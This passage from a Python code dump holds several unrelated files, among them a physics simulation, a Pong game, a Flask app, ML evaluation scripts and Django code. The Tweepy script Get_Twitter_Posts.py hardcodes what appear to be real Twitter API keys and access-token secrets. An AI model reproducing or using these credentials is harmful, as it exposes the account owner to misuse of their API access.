dipole.magnetic)\n m += np.dot(g_m, dipole.magnetic)\n electric[i, j] = electric[i, j] + e\n magnetic[i, j] = magnetic[i, j] + m\n return electric, magnetic\n\n\ndef calc_intensities(X, Z, electric, magnetic):\n len_X = len(X)\n len_Z = len(Z)\n intensity_e = np.zeros((len_X, len_Z))\n intensity_m = np.zeros((len_X, len_Z))\n for i in range(len_X):\n for j in range(len_Z):\n for t in range(3):\n intensity_e[i, j] += np.abs(electric[i, j, t]) ** 2\n intensity_m[i, j] += np.abs(magnetic[i, j, t]) ** 2\n return intensity_e, intensity_m\n\n\ndef calc(ring_subject: Metalens, X, Y, Z, get_intensity=False):\n len_X = len(X)\n len_Z = len(Z)\n dipoles = [Dipole(x, E_in * chi, H_in * chi_m) for x in get_points(ring_subject)]\n electric, magnetic = calc_initial_fields(X, Z)\n electric_d, magnetic_d = calc_dipoles_fields(dipoles, X, Z)\n electric += electric_d\n magnetic += magnetic_d\n intensity_e = np.zeros((len_X, len_Z))\n intensity_m = np.zeros((len_X, len_Z))\n for i in range(len_X):\n for j in range(len_Z):\n for t in range(3):\n intensity_e[i, j] += np.abs(electric[i, j, t]) ** 2\n intensity_m[i, j] += np.abs(magnetic[i, j, t]) ** 2\n intensity = intensity_e + intensity_m\n m = np.transpose(intensity)\n m_e = np.transpose(intensity_e)\n m_m = np.transpose(intensity_m)\n max_z, max_x = np.unravel_index(m.argmax(), m.shape)\n max_z_e, max_x_e = np.unravel_index(m_e.argmax(), m_e.shape)\n max_z_m, max_x_m = np.unravel_index(m_m.argmax(), m_m.shape)\n if get_intensity:\n return intensity_e, intensity_m, intensity\n else:\n return \\\n (X[max_x_e], Z[max_z_e], intensity_e) \\\n , (X[max_x_m], Z[max_z_m], intensity_m) \\\n , (X[max_x], Z[max_z], intensity)\n","sub_path":"physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"576597693","text":"\"\"\" cfg.py \"\"\"\nfrom netpyne import specs\nfrom netpyne.specs import Dict, ODict\n\ncfg = specs.SimConfig() \n\n# Parameters\n#cfg.gna17 = 0.0057\n#cfg.gna18 = 0.013\n\n#cfg.gna17 = 0.01066\n#cfg.gna18 = 0.02427\ncfg.hParams = {'celsius': 37, 'v_init': -50}\ncfg.vrest = cfg.hParams['v_init']\n\n#cfg.gna17 = 0.01\n#cfg.gna18 = 0.03\n#cfg.cndct = [ 1.5 , 0.5 ]\n\n#length of the peripheral axon\ncfg.L = 1000#100000\ncfg.nseg = 101\n#testing dlambda\n\ncfg.gna17 = 0.8 * 0.3\ncfg.gna18 = 0.9 * 0.3 \ncfg.gna19 = 0.06 * 0.5\ncfg.nacndct = [ 1 , 1 , 1 ]\n\ncfg.gk2 = 0.06 # KDR channel\ncfg.gk3 = 0.06 # A-type channel\n\ncfg.gk7 = 0.01 # IM channel 0.02 is the value for XE9 blockade.\n\ncfg.kcndct = [ 0, 1 , 1 , 0, 1]\n\ncfg.navq = { 'nav17': 1.0, 'nav18': 1, 'na19a': 5}\ncfg.kvq = { 'kv2': 1.5 , 'kv3': 3.0 }\n\ncfg.gca = 0\n\n#55.805\n#ena, ek for testing values... maybe? 140/10\n# 66.7 , -81.31\ncfg.ena = 60 #5.8#66.7\ncfg.ek = -70#-81.31\ncfg.rmut = 0.0\n\ncfg.gm = 0.0001\ncfg.delay = [0, 300]#, 250, 300] #, 400, 500, 600 ] #, 200, 300, 400, 500 ]#, 100, 200, 300, 400, 500]#s, 200, 300, 400, 500, 600, 700, 800, 900 ]\n\ncfg.cvode_active = True\n#cfg.dt = 0.01\n#cfg.hParams = {'celsius': 37, 'v_init': -50}\n\ncfg.recordStims = False \ncfg.recordStep = 0.0125\n\ncfg.nav17 = 'nav17'\ncfg.nav18 = 'nav18'\ncfg.nav19 = 'na19a'\n\n#generate recordTraces for the peripheral axon, note that will be in centimeters\nfor x in [ 0.1, 0.3, 0.5, 0.7, 0.9]:\n cfg.recordTraces['v(%.2fcm)' %(x * cfg.L / 10000)] = {'sec': 'axnperi', 'loc': x, 'var': 'v'}\n\n#generate recordTraces for the soma\nfor i, chan in [ ['ina7','nav17'], ['ina8','nav18'], ['ina9','na19a'] ]:\n cfg.recordTraces[i] = {'sec': 'drgsoma', 'loc': 0.5, 'var': 'ina_%s' %(chan)}\n\nfor i, chan in [ ['ikdr','kv2'], ['ika','kv3'], ['ikm','kv7'] ]:\n cfg.recordTraces[i] = {'sec': 'drgsoma', 'loc': 0.5, 'var': 'ik_%s' %(chan)}\n\ncfg.recordTraces['vs'] = {'sec': 'drgsoma', 'loc': 0.5, 'var': 'v'}\ncfg.recordTraces['vc'] = {'sec': 'axncntr', 'loc': 0.5, 'var': 'v'}\n\n# Saving\ncfg.simLabel = 'sim1'\ncfg.saveFolder = 'data'\ncfg.savePickle = False\ncfg.saveJson = True\ncfg.saveDataInclude = ['simData', 'simConfig']\n\n\n# Analysis and plotting \n#cfg.analysis.plotTraces = {'include': ['cnrn'], 'overlay': True, 'oneFigPer': 'cell', 'saveFig': True,#'plots/n7_%.1f_n9_%.3f_k2_%.3f_k3_%.3f.png' %(cfg.nacndct[0], cfg.gna19, cfg.gk2, cfg.gk3), \n# 'showFig': False, 'timeRange': [cfg.delay[0], cfg.duration]}\n\ncfg.duration = cfg.delay[-1] + 25\ncfg.analysis.plotTraces = {'include': ['cnrn'], 'overlay': True, 'oneFigPer': 'cell', 'saveFig': True,#'plots/n7_%.1f_n9_%.3f_k2_%.3f_k3_%.3f.png' %(cfg.nacndct[0], cfg.gna19, cfg.gk2, cfg.gk3), \n 'showFig': False, 'timeRange': [cfg.delay[1] - 5, cfg.duration]}\n","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"115666413","text":"import sys\nimport os\nimport pygame\nimport pygame_gui\n\nBLACK = (0, 0, 0)\nGRAY = (200, 203, 200)\n\nscore = 0\nscore2 = 0\n\npygame.init()\npygame.display.set_caption('Pong')\nsize = width, height = 800, 600\nscreen = pygame.display.set_mode(size)\nfps = 60\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\ndef load_image(name, colorkey=None): # загрузка изображения\n fullname = os.path.join('data', name)\n if not os.path.isfile(fullname):\n print(f\"Файл с изображением '{name}' не найден\")\n sys.exit()\n image = pygame.image.load(fullname)\n if colorkey is not None:\n image = image.convert()\n if colorkey == -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\n\ndef start_screen(): # начальное меню\n \"\"\"\n Начальная заставка с кнопками\n \"\"\"\n global score\n global score2\n manager = pygame_gui.UIManager((800, 600), os.path.join('data', 'menu_theme.json'))\n # Кнопки\n start_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((800 // 2 - 75, 600 // 3 - 25), (150, 50)),\n text='Начать игру',\n manager=manager\n )\n exit_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((800 // 2 - 75, 600 // 2 + 125), (150, 50)),\n text='Выход',\n manager=manager\n )\n back = load_image('fon.jpg')\n screen.blit(back, (0, 0))\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == start_btn:\n score = 0\n score2 = 0\n game()\n if event.ui_element == exit_btn:\n terminate()\n manager.process_events(event)\n manager.update(fps / 1000)\n manager.draw_ui(screen)\n pygame.display.flip()\n clock.tick(fps)\n\n\ndef finish_screen(): # экран победы для первого игрока\n intro_text = [\"Это\",\n \"Было\",\n \"Слишком лекго\",\n \"Игрок номер один, ты слишком силен\",\n \"Нажмите пробел чтобы вернуться в меню\"]\n\n fon = pygame.transform.scale(load_image('fon.jpg'), (800, 600))\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('gray'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start_screen()\n pygame.display.flip()\n clock.tick(fps)\n\n\ndef finish_screen2(): # экран победы для второго игрока\n intro_text = [\"Вау\",\n \"Как ты смог \",\n \"Победить\",\n \"Игрок номер два?\",\n \"Нажмите пробел чтобы вернуться в меню\"]\n\n fon = pygame.transform.scale(load_image('fon.jpg'), (800, 600))\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('gray'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start_screen()\n pygame.display.flip()\n clock.tick(fps)\n\n\nclass Ball(pygame.sprite.Sprite): # собственно шар\n def __init__(self, radius, x, y):\n super().__init__(all_sprites)\n self.radius = radius\n self.image = pygame.Surface((2 * radius, 2 * radius),\n pygame.SRCALPHA, 32)\n pygame.draw.circle(self.image, pygame.Color(\"white\"),\n (radius, radius), radius)\n self.rect = pygame.Rect(x, y, 2 * radius, 2 * radius)\n self.vx = 4\n self.vy = 5\n self.boom = pygame.mixer.Sound(os.path.join('data', 'ponk.wav')) # звук столкновения\n\n def update(self):\n self.rect = self.rect.move(self.vx, self.vy)\n if pygame.sprite.spritecollideany(self, horizontal_borders):\n self.vy = -self.vy\n self.boom.play()\n if pygame.sprite.spritecollideany(self, vertical_borders):\n self.vx = -self.vx\n self.boom.play()\n\n\nclass Border(pygame.sprite.Sprite):\n # строго вертикальный или строго горизонтальный отрезок\n def __init__(self, x1, y1, x2, y2):\n super().__init__(all_sprites)\n if x1 == x2: # вертикальная стенка\n self.add(vertical_borders)\n self.image = pygame.Surface([6, y2 - y1])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, 1, y2 - y1)\n else: # горизонтальная стенка\n self.add(horizontal_borders)\n self.image = pygame.Surface([x2 - x1, 6])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, x2 - x1, 1)\n\n\nclass Pl(pygame.sprite.Sprite): # игрок номер один\n def __init__(self, x1, y1, x2, y2):\n super().__init__(all_sprites)\n self.add(vertical_borders)\n self.image = pygame.Surface([x2 - x1, y2 - y1])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, x2 - x1, y2 - y1)\n\n\nclass Pl2(pygame.sprite.Sprite): # игрок номер два\n def __init__(self, x1, y1, x2, y2):\n super().__init__(all_sprites)\n self.add(vertical_borders)\n self.image = pygame.Surface([x2 - x1, y2 - y1])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, x2 - x1, y2 - y1)\n\n\ndef draw(): # рисование теннисной сетки\n pygame.draw.line(screen, GRAY, (400, 0), (400, 600), 5)\n\n\ndef game():\n global score\n global score2\n goal = pygame.mixer.Sound(os.path.join('data', 'prob.wav')) # звук забивания гола\n Border(0, 100, 800, 100)\n Border(5, height - 5, width - 5, height - 5)\n player = Pl(0, 200, 20, 350)\n player2 = Pl2(780, 200, 800, 350)\n ball = Ball(12, 400, 300)\n for i in range(1):\n ball\n running = True\n while running:\n if ball.rect.x >= 800:\n ball.rect.x = 400\n ball.rect.y = 300\n score += 1\n goal.play()\n if score == 3:\n player.kill()\n player2.kill()\n ball.kill()\n finish_screen()\n elif ball.rect.x <= 0:\n ball.rect.x = 400\n ball.rect.y = 300\n score2 += 1\n goal.play()\n if score2 == 3:\n player.kill()\n player2.kill()\n ball.kill()\n finish_screen2()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n terminate()\n if pygame.key.get_pressed()[pygame.K_w]:\n player.rect.y -= 7\n if player.rect.y < 99:\n player.rect.y = 100\n if pygame.key.get_pressed()[pygame.K_s]:\n player.rect.y += 7\n if player.rect.y > 455:\n player.rect.y = 455\n if pygame.key.get_pressed()[pygame.K_UP]:\n player2.rect.y -= 7\n if player2.rect.y < 99:\n player2.rect.y = 100\n if pygame.key.get_pressed()[pygame.K_DOWN]:\n player2.rect.y += 7\n if player2.rect.y > 455:\n player2.rect.y = 455\n draw()\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n all_sprites.update()\n font = pygame.font.Font(None, 85)\n text = font.render(str(score), 1, (255, 255, 255))\n screen.blit(text, (200, 25))\n text = font.render(str(score2), 1, (255, 255, 255))\n screen.blit(text, (600, 25))\n clock.tick(fps)\n draw()\n pygame.display.flip()\n\n\nclock = pygame.time.Clock()\nall_sprites = pygame.sprite.Group()\nhorizontal_borders = pygame.sprite.Group()\nvertical_borders = pygame.sprite.Group()\nstart_screen()\npygame.quit()\n","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"609883571","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\nfrom mindspore.ops import Primitive\nfrom mindspore.ops import operations as P\n\nmake_tuple = Primitive('make_tuple')\ntuple_getitem = Primitive('tuple_getitem')\nconv = P.Conv2D(out_channel=64, kernel_size=7, mode=1, pad_mode=\"valid\", pad=0, stride=1, dilation=1, group=1)\nbn = P.FusedBatchNorm()\nrelu = P.ReLU()\nconv_bn1 = Primitive('ConvBN1')\nbn2_relu = Primitive('BN2Relu')\n\n\nclass FnDict:\n def __init__(self):\n self.fnDict = {}\n\n def __call__(self, fn):\n self.fnDict[fn.__name__] = fn\n\n def __getitem__(self, name):\n return self.fnDict[name]\n\n\ndef test_conv_bn_relu_fusion(tag):\n \"\"\" test_conv_bn_relu_fusion \"\"\"\n fns = FnDict()\n\n @fns\n def before(x, w, scale, b, mean, variance):\n conv_output = conv(x, w)\n bn_output = bn(conv_output, scale, b, mean, variance)\n item0 = tuple_getitem(bn_output, 0)\n item1 = tuple_getitem(bn_output, 3)\n item2 = tuple_getitem(bn_output, 4)\n output = make_tuple(relu(item0), item1, item2)\n res = tuple_getitem(output, 0)\n return res\n\n @fns\n def after(x, w, scale, b, mean, variance):\n conv_bn1_output = conv_bn1(x, w)\n conv_item0 = tuple_getitem(conv_bn1_output, 0)\n conv_item1 = tuple_getitem(conv_bn1_output, 1)\n conv_item2 = tuple_getitem(conv_bn1_output, 2)\n bn2_relu_output = bn2_relu(conv_item0, conv_item1, conv_item2, scale, b, mean, variance)\n bn2_relu_item0 = tuple_getitem(bn2_relu_output, 0)\n bn2_relu_item1 = tuple_getitem(bn2_relu_output, 1)\n bn2_relu_item2 = tuple_getitem(bn2_relu_output, 2)\n bn2_relu_item3 = tuple_getitem(bn2_relu_output, 3)\n new_make_tuple = make_tuple(bn2_relu_item0, bn2_relu_item1, bn2_relu_item2, conv_item2, bn2_relu_item3)\n item1 = tuple_getitem(new_make_tuple, 3)\n item2 = tuple_getitem(new_make_tuple, 4)\n output = make_tuple(bn2_relu_item0, item1, item2)\n return make_tuple(tuple_getitem(output, 0))\n\n return fns[tag]\n","sub_path":"tests/ut/cpp/python_input/gtest_input/pre_activate/conv_bn_relu_fusion.py","file_name":"conv_bn_relu_fusion.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9680895","text":"\"\"\"Import of all required libraries\"\"\"\nimport time\nimport string\nimport re\nimport tweepy\nfrom tweepy.parsers import JSONParser\nfrom tqdm import *\nfrom colorama import Fore\nfrom tabulate import tabulate\n\n\ndef get_tweets(user_name, counter):\n \"\"\"Function that gets tweets from Twitter API and returns of tweets for a user input.\"\"\"\n\n consumer_key = 'h9TsXsqm4F7ctc9buiUsiWnN4'\n consumer_secret_key = '5dh9YGaFsXHxYLcpyhPbsA5FtQH1Jxgr2nQOXZXV3gfVrG3GlK'\n access_token = '708686394-5pzbHEvfV8yNyXdwv9hK94hEEmkdPKlb4MPhkG20'\n access_token_secret = 'Jv2YaAdxWrtucDfYwzhcRaZqqynsjWVgG7UTyUcRV1TAk'\n try:\n\n authenticator = tweepy.OAuthHandler(consumer_key, consumer_secret_key)\n authenticator.set_access_token(access_token, access_token_secret)\n api = tweepy.API(authenticator, parser=tweepy.parsers.JSONParser())\n print(Fore.CYAN + \"Waiting for Twitter to respond...\")\n tweet_info = api.user_timeline(screen_name=user_name, count=counter)\n user_tweets = []\n tweet_dates = []\n print(Fore.CYAN + \"Populating {}'s list of tweets...\\n\".format(user_name))\n punctuation = list(string.punctuation)\n header = ['Date', 'Tweet']\n for tweet in tqdm(tweet_info):\n if tweet not in punctuation:\n user_tweets.append(re.sub('[^\\x00-\\x7F]+', \"\", tweet['text']))\n tweet_dates.append(tweet['created_at'])\n time.sleep(0.03)\n tweet_dic = dict(zip(user_tweets, tweet_dates))\n table = sorted([(v[:11], k) for k, v in tweet_dic.items()])\n print(tabulate(table, headers=header, tablefmt='fancy_grid', stralign=\"left\")+'\\n')\n return user_tweets\n except tweepy.TweepError:\n print(\"That's not a real Twitter handle boss. Try again!\\n\")\n\n\n \n\n\n\n\n\n","sub_path":"Get_Twitter_Posts.py","file_name":"Get_Twitter_Posts.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"458758168","text":"from flask import Flask\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return \"

Hello World!!

\"\r\n\r\n\r\n#@app.route(\"/david\")\r\n#def david():\r\n# return \"

Hello David!!

\"\r\n\r\n\r\n@app.route(\"/\")\r\ndef hello(name):\r\n name = name.capitalize()\r\n return f\"

Hello, {name}

\"\r\n\r\n\r\n#''' env FLASK_APP=flask_application.py flask run '''\r\n","sub_path":"flask_application.py","file_name":"flask_application.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161138488","text":"#!/usr/bin/python\n\nimport pandas as pd\nimport json\nfrom uuid import uuid4\nimport time, sys, os, shutil, glob, io, requests\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml import Pipeline, Model, PipelineModel\nfrom pyspark.sql import SQLContext\nimport dsx_core_utils\nfrom dsx_ml.ml import save_evaluation_metrics\n\n\n# setup dsxr environmental vars from command line input\nfrom dsx_ml.ml import dsxr_setup_environment\ndsxr_setup_environment()\n\n# define variables\nargs = {\"dataset\": \"/datasets/TradingCustomerSparkMLEval.csv\", \"published\": \"false\", \"threshold\": {\"metric\": \"f1Score\", \"min_value\": 0.7, \"mid_value\": 0.87}, \"evaluator_type\": \"multiclass\", \"execution_type\": \"DSX\", \"remoteHost\": \"\", \"remoteHostImage\": \"\", \"livyVersion\": \"livyspark2\"}\nmodel_path = os.path.join(os.getenv(\"DSX_PROJECT_DIR\"), \"models\", os.getenv(\"DEF_DSX_MODEL_NAME\", \"TradingChurnRiskClassificationSparkML\"), os.getenv(\"DEF_DSX_MODEL_VERSION\", \"1\"), \"model\")\n\n# create spark context\nspark = SparkSession.builder.getOrCreate()\nsc = spark.sparkContext\n\n# load the input data\n\ninput_data = os.getenv(\"DEF_DSX_DATASOURCE_INPUT_FILE\", os.getenv(\"DSX_PROJECT_DIR\") + args.get(\"dataset\"))\ndataframe = SQLContext(sc).read.csv(input_data , header=\"true\", inferSchema = \"true\")\n\n# load the model from disk \nmodel_rf = PipelineModel.load(model_path)\n\n\nstartTime = int(time.time())\n\n# generate predictions\npredictions = model_rf.transform(dataframe)\n\nthreshold = {'metric': 'f1Score', 'min_value': 0.7, 'mid_value': 0.87}\n\n# replace \"label\" below with the numeric representation of\n# the label column that you defined while training the model\nlabelCol = \"label\"\n\n# create evaluator\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nevaluator = MulticlassClassificationEvaluator(labelCol=labelCol)\n\n# compute evaluations\neval_fields = {\n \"accuracyScore\": evaluator.evaluate(predictions, {evaluator.metricName: \"accuracy\"}),\n \"f1Score\": evaluator.evaluate(predictions, {evaluator.metricName: \"f1\"}),\n \"weightedPrecisionScore\": evaluator.evaluate(predictions, {evaluator.metricName: \"weightedPrecision\"}),\n \"weightedRecallScore\": evaluator.evaluate(predictions, {evaluator.metricName: \"weightedRecall\"}),\n \"thresholdMetric\": threshold[\"metric\"],\n \"thresholdMinValue\": threshold[\"min_value\"],\n \"thresholdMidValue\": threshold[\"mid_value\"]\n }\n\n# feel free to customize to your own performance logic using the values of \"good\", \"poor\", and \"fair\".\nif(eval_fields[eval_fields[\"thresholdMetric\"]] >= threshold.get('mid_value', 0.70)):\n eval_fields[\"performance\"] = \"good\"\nelif(eval_fields[eval_fields[\"thresholdMetric\"]] <= threshold.get('min_value', 0.25)):\n eval_fields[\"performance\"] = \"poor\"\nelse:\n eval_fields[\"performance\"] = \"fair\"\n\nsave_evaluation_metrics(eval_fields, \"TradingChurnRiskClassificationSparkML\", \"1\", startTime)","sub_path":"scripts/TradingChurnRiskClassificationSparkML-model-evaluation-1566217586425.py","file_name":"TradingChurnRiskClassificationSparkML-model-evaluation-1566217586425.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"578219643","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\r\n# Embedded file name: scripts/client/vehicle_systems/vehicle_assembler.py\r\nfrom CustomEffectManager import CustomEffectManager\r\nfrom VehicleEffects import VehicleExhaustEffects, VehicleTrailEffects\r\nfrom vehicle_systems.CompoundAppearance import CompoundAppearance\r\nfrom vehicle_systems.components.world_connectors import GunRotatorConnector\r\nfrom vehicle_systems.model_assembler import prepareCompoundAssembler\r\nimport functools\r\nfrom constants import VEHICLE_PHYSICS_MODE\r\nfrom vehicle_systems.components.vehicle_audition_wwise import EngineAuditionWWISE, TrackCrashAuditionWWISE\r\nimport weakref\r\nimport BigWorld\r\nimport WoT\r\nfrom vehicle_systems.components.engine_state import DetailedEngineStateWWISE\r\nfrom vehicle_systems.components.highlighter import Highlighter\r\nfrom helpers import gEffectsDisabled\r\n\r\ndef createAssembler(vehicle):\r\n return PanzerAssemblerWWISE(vehicle)\r\n\r\n\r\nclass VehicleAssemblerAbstract(object):\r\n appearance = property()\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def prerequisites(self):\r\n return None\r\n\r\n def constructAppearance(self, prereqs):\r\n return None\r\n\r\n\r\nclass _CompoundAssembler(VehicleAssemblerAbstract):\r\n appearance = property(lambda self: self.__appearance)\r\n\r\n def __init__(self, vehicle):\r\n VehicleAssemblerAbstract.__init__(self)\r\n self.__appearance = CompoundAppearance()\r\n self.__vehicleRef = weakref.ref(vehicle)\r\n\r\n def prerequisites(self):\r\n vehicle = self.__vehicleRef()\r\n prereqs = self.__appearance.prerequisites(vehicle)\r\n compoundAssembler = prepareCompoundAssembler(vehicle.typeDescriptor, self.__appearance.damageState.modelState, BigWorld.player().spaceID, vehicle.isTurretDetached)\r\n return prereqs + [compoundAssembler]\r\n\r\n def _assembleParts(self, vehicle, appearance):\r\n pass\r\n\r\n def constructAppearance(self, prereqs):\r\n self._assembleParts(self.__vehicleRef(), self.__appearance)\r\n return self.__appearance\r\n\r\n\r\nclass PanzerAssemblerWWISE(_CompoundAssembler):\r\n\r\n @staticmethod\r\n def __assembleEngineState(vehicle):\r\n detailedEngineState = DetailedEngineStateWWISE()\r\n isPlayerVehicle = vehicle.isPlayerVehicle\r\n if isPlayerVehicle:\r\n detailedEngineState.physicRPMLink = lambda : WoT.unpackAuxVehiclePhysicsData(BigWorld.player().ownVehicleAuxPhysicsData)[5]\r\n detailedEngineState.physicGearLink = lambda : BigWorld.player().ownVehicleGear\r\n else:\r\n detailedEngineState.physicRPMLink = lambda : 0.0\r\n detailedEngineState.physicGearLink = lambda : 0\r\n return detailedEngineState\r\n\r\n @staticmethod\r\n def __assembleEngineAudition(vehicle, appearance):\r\n vehicle = weakref.proxy(vehicle)\r\n appearance = weakref.proxy(appearance)\r\n engineAudition = EngineAuditionWWISE(vehicle.physicsMode, vehicle.isPlayerVehicle, appearance.compoundModel, vehicle.typeDescriptor, vehicle.id)\r\n e = engineAudition\r\n e.isUnderwaterLink = lambda : appearance.isUnderwater\r\n e.isInWaterLink = lambda : appearance.isInWater\r\n e.isFlyingLink = functools.partial(PanzerAssemblerWWISE.__isFlying, vehicle, appearance)\r\n e.curTerrainMatKindLink = lambda : appearance.terrainMatKind\r\n e.leftTrackScrollLink = lambda : appearance.leftTrackScroll\r\n e.leftTrackScrollRelativeLink = lambda : appearance.customEffectManager.getParameter('deltaL')\r\n e.rightTrackScrollLink = lambda : appearance.rightTrackScroll\r\n e.rightTrackScrollRelativeLink = lambda : appearance.customEffectManager.getParameter('deltaR')\r\n e.detailedEngineState = appearance.detailedEngineState\r\n e.vehicleFilter = vehicle.filter\r\n return e\r\n\r\n @staticmethod\r\n def __isFlying(vehicle, appearance):\r\n filter = vehicle.filter\r\n if filter.placingOnGround:\r\n contactsWithGround = filter.numLeftTrackContacts + filter.numRightTrackContacts\r\n return contactsWithGround == 0\r\n else:\r\n return appearance.fashion.isFlying\r\n\r\n @staticmethod\r\n def __createTrackCrashControl(vehicle, appearance):\r\n if vehicle.physicsMode == VEHICLE_PHYSICS_MODE.DETAILED:\r\n if vehicle.isAlive() and appearance.customEffectManager is not None:\r\n trackCenterNodes = tuple((appearance.customEffectManager.getTrackCenterNode(x) for x in xrange(2)))\r\n appearance.trackCrashAudition = TrackCrashAuditionWWISE(trackCenterNodes)\r\n else:\r\n trackCenterNodes = tuple((appearance.trailEffects.getTrackCenterNode(x) for x in xrange(2)))\r\n appearance.trackCrashAudition = TrackCrashAuditionWWISE(trackCenterNodes)\r\n return\r\n\r\n def _assembleParts(self, vehicle, appearance):\r\n appearance.detailedEngineState = self.__assembleEngineState(vehicle)\r\n _createEffects(vehicle, appearance)\r\n if vehicle.isAlive():\r\n if not appearance.isPillbox and not gEffectsDisabled():\r\n appearance.engineAudition = self.__assembleEngineAudition(vehicle, appearance)\r\n appearance.detailedEngineState.onEngineStart += appearance.engineAudition.onEngineStart\r\n if vehicle.isPlayerVehicle:\r\n gunRotatorConnector = GunRotatorConnector(appearance.compoundModel)\r\n appearance.addComponent(gunRotatorConnector)\r\n self.__createTrackCrashControl(vehicle, appearance)\r\n appearance.highlighter = Highlighter(vehicle)\r\n\r\n\r\ndef _createEffects(vehicle, appearance):\r\n if not vehicle.isAlive():\r\n return\r\n elif gEffectsDisabled():\r\n appearance.customEffectManager = None\r\n return\r\n else:\r\n if vehicle.physicsMode == VEHICLE_PHYSICS_MODE.DETAILED:\r\n appearance.customEffectManager = CustomEffectManager(vehicle, appearance.detailedEngineState)\r\n else:\r\n appearance.exhaustEffects = VehicleExhaustEffects(vehicle.typeDescriptor)\r\n appearance.trailEffects = VehicleTrailEffects(vehicle)\r\n return\r\n","sub_path":"res/scripts/client/vehicle_systems/vehicle_assembler.py","file_name":"vehicle_assembler.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549288624","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('subscriptions', '0011_auto_20151201_1936'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='recurly_plan_code',\n field=models.CharField(validators=[django.core.validators.RegexValidator(regex='(?i)[a-z0-9@\\\\-_\\\\.]')], unique=True, help_text='Used to uniquely identify the product in recurly.', verbose_name='Recurly Plan Code', blank=True, max_length=50),\n ),\n ]\n","sub_path":"subscriptions/migrations/0012_product_recurly_plan_code.py","file_name":"0012_product_recurly_plan_code.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650162474","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.template import RequestContext\n\nfrom enemygen.models import EnemyTemplate, Setting, Ruleset, EnemyTemplate, Race, Weapon\nfrom enemygen.views_lib import get_setting, get_ruleset, get_context, get_enemies, spell_list\nfrom enemygen.views_lib import get_enemy_templates, combat_styles, is_race_admin\n\ndef index(request):\n setting = get_setting(request)\n ruleset = get_ruleset(request)\n context = get_context(request)\n context['templates'] = get_enemy_templates(ruleset, setting, request.user)\n return render(request, 'index.html', context)\n \ndef generate_enemies(request):\n if not request.POST:\n return redirect('index')\n context = get_context(request)\n context['enemies'] = get_enemies(request)\n return render(request, 